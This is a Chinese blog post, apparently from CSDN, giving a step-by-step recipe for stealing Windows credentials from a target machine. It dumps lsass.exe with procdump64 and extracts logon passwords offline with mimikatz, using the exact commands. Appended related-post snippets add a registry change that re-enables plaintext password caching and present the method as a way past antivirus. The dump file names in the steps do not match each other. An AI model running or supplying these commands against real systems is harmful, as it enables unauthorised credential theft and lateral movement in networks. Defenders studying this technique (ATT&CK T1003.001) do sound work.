密码抓取--Prodump+Mimikatz抓取windows系统密码

原创 已于 2024-01-11 16:16:28 修改 · 1.7k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
本文为博主原创文章,未经博主允许不得转载。
标签
#procdump #mimikatz #密码抓取
于 2020-02-13 18:35:51 首次发布
本文介绍了一种在Windows系统中提取管理员密码的方法。包括检查管理员登录状态、获取系统版本信息、利用Procdump抓取lsass.exe进程数据并保存为lsass.dmp文件、以及使用mimikatz在本地解密目标系统密码的步骤。

1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。
query user
在这里插入图片描述

2、查看目标系统版本。
wmic OS get Caption,OSArchitecture
在这里插入图片描述
3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
在这里插入图片描述
4、将lsass.tmp拉取到本地使用mimikatz解密目标系统密码。(本地机器需与目标机器的版本位数一致。)
mimikatz.exe “log res.log” “sekurlsa::minidump tmp.dmp” “sekurlsa::logonPasswords full” exit
在这里插入图片描述

procdumpmimikatz联动
weixin_45715461的博客
06-30 920
procdumpmimikatz联动
网安学习-内网渗透3
weixin_44770698的博客
07-30 5658
网安学习-内网渗透3(单纯记录学习思路)
mimikatz+procdump】内网渗透实战:离线读取lsass.exe内存密码的完整指南
最新发布
weixin_30814329的博客
04-17 260
本文详细介绍了在内网渗透测试中,如何利用mimikatzprocdump工具离线读取lsass.exe内存密码的完整指南。通过实战步骤和高级技巧,帮助安全研究人员有效获取系统凭证,同时提供防御建议以应对此类攻击。
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 4626
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
01-windows调试工具(ProcDump使用)
热门推荐
qq_37103755的博客
11-21 1万+
windows ProcDump工具使用
ProcDump+Mimikatz绕过杀毒软件抓密码
希望我的博客,能帮上你解决学习中工作中所遇到的问题
03-02 1293
如果主机上装了杀毒软件,开了防火墙,例如:360、火绒之类的话。Mimikatz就会被检测为病毒,无法使用,而想要对Mimikatz进行二次开发或者免杀难度会比较大,那有办法去解决这个问题吗?答案是肯定的,那就是ProcDump+Mimikatz绕过杀毒软件抓密码。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用。导出lsass.dmp文件后,使用猕猴桃读取密码hash。读取对方内网机器密码
关于Windows系列密码抓取
weixin_30790841的博客
03-31 454
首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的...
Win2012 Server抓HASH(本地+域)
mfkpie的专栏
08-25 8775
Win2012 Server抓HASH(本地+域) 为避免文章过长,这里就不贴出详细测试过程了。经过我的测试,发现本地用户hash抓取的方法中,以下几种方式是可行的: hash:在线解密: http://www.objectif-securite.ch/ophcrack.php 注册表导出+cain Pwdump7.exe QuarksPwDump.exe mim
Mimikatz + procdump 的使用
键盘上温暖而又美好的时光 .
11-15 7523
控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 ​​​​​​https://github.com/gentilkiwi/mimikatz/releases privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 mimikatz是从 lsass.exe进程中获取windows的账号及密码的, 这时,我们可以帮对方安装一个procdump64.exe(这是微软自己的工具,可以放心使用) 然后从 lsass.exe
内网渗透-Mimikatz+Procdump的使用
weixin_60830484的博客
04-24 1043
在内网渗透中,获取目标明文密码是必不可少的一部分,可以扩大"攻击面",因此本文将讲解相关工具的使用以及原理。
域横向移动分析
qq_38675102的博客
12-31 1210
windwos内网横移学习笔记
利用procdump+Mimikatz绕过杀软获取Windows明文密码
大河之犬的博客
09-12 1284
Mimikatz是从lsass.exe中提取明文密码的,当无法在目标机器上运行Mimikatz时,我们可使用ProcDump工具将系统的lsass.exe进程进行转储,导出dmp文件,拖回到本地后,在本地再利用Mimikatz进行读取。而ProcDump本身是作为一个正常的运维辅助工具使用,并不带毒,所以不会被杀软查杀。
Procdump神技能】轻松设置进程转储规则,解锁故障排查新姿势!
jiawei_eek的博客
03-27 3285
ProcDump是一个命令行实用工具,其主要用途是监视应用程序的CPU峰值,并在出现峰值期间生成故障转储,管理员或开发人员可以使用这些转储来确定出现峰值的原因。
promdump:Prometheus数据块转储工具使用指南
gitblog_00391的博客
09-11 888
promdump:Prometheus数据块转储工具使用指南 一、项目目录结构及介绍 promdump/ ├── cmd/ │ └── main.go # 主程序入口,包含dump和restore命令的实现 ├── docs/ # 文档资料,可能包括API文档、用户指南等 ├── internal/ │ ├── api/ ...
Prometheus数据块转储工具:Promdump快速入门指南
gitblog_00736的博客
09-11 1169
Prometheus数据块转储工具:Promdump快速入门指南 项目介绍 Promdump 是一个专为 Prometheus 设计的数据块导出与恢复工具。不同于 promtool tsdb dump 命令,它提供了更为灵活的时间范围过滤功能,允许用户仅导出指定时间段内的持久化数据块。这特别适用于需要在不中断 Prometheus 实例运行的情况下,进行数据迁移或备份特定时间窗口的监控数据场景。...
windows密码抓取
qq_53932050的博客
10-22 492
将得到的lsass.dmp放到mimikatz启动的根目录下。procdump文件根目录运行。
ATT&CK-T1003-001-操作系统凭据转储:LSASS内存
swordheart的博客
12-07 1543
攻击者可能会尝试访问存储在本地安全机构子系统服务 (LSASS) 进程内存中的凭证材料。用户登录后,系统生成各种凭证材料,存储在LSASS进程内存中。这些凭证材料可以由管理用户或 SYSTEM 获取,并用于使用使用备用身份验证材料 进行横向移动 。与内存技术一样,LSASS 进程内存可以从目标主机转储并在本地系统上进行分析。例如,在目标主机上使用 procdump: 在本地,可以使用以下方式运行 mimikatz: 也可以使用内置的 Windows 工具,例如 comsvcs.dll: W
内网渗透之mimikatz+procdump 提取 Windows 明文密码
Adminxe的博客
05-05 3866
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。 0x01 操作 Windows10/2012 以下的版本: 1、上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2、拿到 mimika...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

LQxdp

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值